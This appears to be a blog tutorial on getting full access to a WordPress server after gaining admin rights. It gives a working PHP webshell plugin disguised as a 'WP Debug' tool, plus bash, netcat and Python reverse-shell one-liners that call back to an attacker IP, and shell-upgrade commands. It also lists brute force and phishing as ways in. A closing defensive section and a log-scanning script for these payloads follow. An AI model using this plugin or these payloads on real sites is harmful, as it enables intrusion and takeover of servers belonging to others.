WordPress Reverse Shell: Achieving Full Access

Published on February 14, 2025


1. Introduction

WordPress allows users to install plugins, which extend the platform’s functionality. However, this feature can be misused to execute arbitrary code. If an attacker gains admin access to a WordPress site, they can install a malicious plugin that acts as a webshell, enabling command execution and remote access.

2. Gaining Admin Access

To install a plugin, an attacker must first obtain administrator privileges. This can be achieved through various methods:

  • Exploiting weak passwords using brute-force attacks.
  • Phishing for the admin credentials.
  • Exploiting vulnerabilities in outdated plugins.
  • Leveraging stored XSS or SQL Injection to escalate privileges.

Once admin access is obtained, the attacker can install a custom WordPress plugin that provides remote command execution.

3. Creating a WordPress Webshell Plugin

A WordPress plugin is a small PHP script that runs within WordPress to extend its capabilities. Below is a simple plugin that allows executing system commands.

<?php
/**
 * Plugin Name: WP Shell Plugin
 * Description: A debugging tool with hidden command execution.
 */

if (!defined('ABSPATH')) { exit; }

function wp_hidden_webshell() {
    if (isset($_GET['cmd']) && is_user_logged_in() && current_user_can('administrator')) {
        echo "<pre>";
        system($_GET['cmd']);
        echo "</pre>";
        exit;
    }
}

add_action('admin_menu', function() {
    add_menu_page('WP Debug', 'WP Debug', 'manage_options', 'wp-debug', 'wp_hidden_webshell', 'dashicons-admin-tools', 99);
});
?>

Usage: Install this plugin and access the webshell via:

http://target.com/wp-admin/admin.php?page=wp-debug&cmd=whoami

4. Sending a Reverse Shell in One Command

Instead of manually executing multiple commands, you can send a one-liner reverse shell through the cmd= parameter.

Bash Reverse Shell

http://target.com/wp-admin/admin.php?page=wp-debug&cmd=bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'

It needs to be properly encoded in order to escape > and &:

http://target.com/wp-admin/admin.php?page=wp-debug&cmd=bash%20-c%20'bash%20-i%20%3E%26%20/dev/tcp/YOUR_IP/4444%200%3E%261'

Netcat Reverse Shell

http://target.com/wp-admin/admin.php?page=wp-debug&cmd=nc -e /bin/sh YOUR_IP 4444

Python Reverse Shell

http://target.com/wp-admin/admin.php?page=wp-debug&cmd=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("YOUR_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

5. Upgrading the Reverse Shell

Once a reverse shell is established, it may be limited in functionality. Below are several methods to upgrade it to a fully interactive shell.

Python TTY Upgrade

python3 -c 'import pty; pty.spawn("/bin/bash")'

Using script for Full TTY

script /dev/null -c bash

stty and Backgrounding

stty raw -echo; fg
export TERM=xterm

6. Defending Against Reverse Shells

To secure WordPress against reverse shell attacks, follow these best practices:

  • Disable dangerous PHP functions (exec(), system(), shell_exec()).
  • Restrict plugin installations to trusted administrators.
  • Monitor web requests for suspicious activity (cmd= in URLs).
  • Use a Web Application Firewall (WAF) to block command injection attempts.
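The monitoring bullet above can be made concrete with a small access-log scanner. This is an added example, not code from the original article: the log lines are constructed samples in the common "combined" format, and the names classify, scan, SHELL_PATTERNS and SUSPECT_PARAMS are hypothetical. It decodes each query string before matching, because the encoded forms shown in section 4 never contain the literal text a raw search would look for.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in "combined" access-log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [14/Feb/2025:10:01:02 +0000] "GET /wp-admin/admin.php?page=wp-debug&cmd=whoami HTTP/1.1" 200 512 "-" "curl/8.5.0"
203.0.113.7 - - [14/Feb/2025:10:01:40 +0000] "GET /wp-admin/admin.php?page=wp-debug&cmd=bash%20-c%20'bash%20-i%20%3E%26%20/dev/tcp/YOUR_IP/4444%200%3E%261' HTTP/1.1" 200 0 "-" "curl/8.5.0"
203.0.113.7 - - [14/Feb/2025:10:02:05 +0000] "GET /wp-admin/admin.php?page=wp-debug&cmd=nc+-e+/bin/sh+YOUR_IP+4444 HTTP/1.1" 200 0 "-" "curl/8.5.0"
198.51.100.20 - - [14/Feb/2025:10:02:11 +0000] "GET /wp-admin/admin.php?page=wc-settings&tab=shipping HTTP/1.1" 200 48211 "-" "Mozilla/5.0"
198.51.100.20 - - [14/Feb/2025:10:03:30 +0000] "GET /?s=nc+state+parks HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
"""

REQUEST = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Indicators in the decoded value, taken from the one-liners in section 4.
SHELL_PATTERNS = re.compile(
    r"/dev/tcp/|\bbash\s+-i\b|\bnc\s+-e\b|\bpython3?\s+-c\b.*\bsocket\b|/bin/(ba)?sh\b")
SUSPECT_PARAMS = {"cmd"}  # the parameter the article's plugin reads; extend as needed


def classify(target):
    """Return 'reverse-shell', 'command-param' or None for one request target."""
    parts = urlsplit(target)
    verdict = None
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        # parse_qsl has already percent-decoded the value and turned '+' into ' '.
        if SHELL_PATTERNS.search(value):
            return "reverse-shell"
        if name.lower() in SUSPECT_PARAMS and parts.path.startswith("/wp-admin/"):
            verdict = "command-param"
    return verdict


def scan(log_text):
    """Return (client_ip, verdict, target) for every flagged log line."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        verdict = classify(m.group("target"))
        if verdict:
            findings.append((m.group("ip"), verdict, m.group("target")))
    return findings

if __name__ == "__main__":
    for ip, verdict, target in scan(SAMPLE_LOG):
        print(f"{verdict:14} {ip:15} {target}")
```

Run it against the web server's access log by passing the file contents to scan(); the two benign requests in the sample (a settings page and a site search containing "nc") are not flagged.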

7. Conclusion

WordPress plugins can be used to execute a reverse shell, granting an attacker remote access to the system. However, proper security hardening and monitoring can prevent these attacks.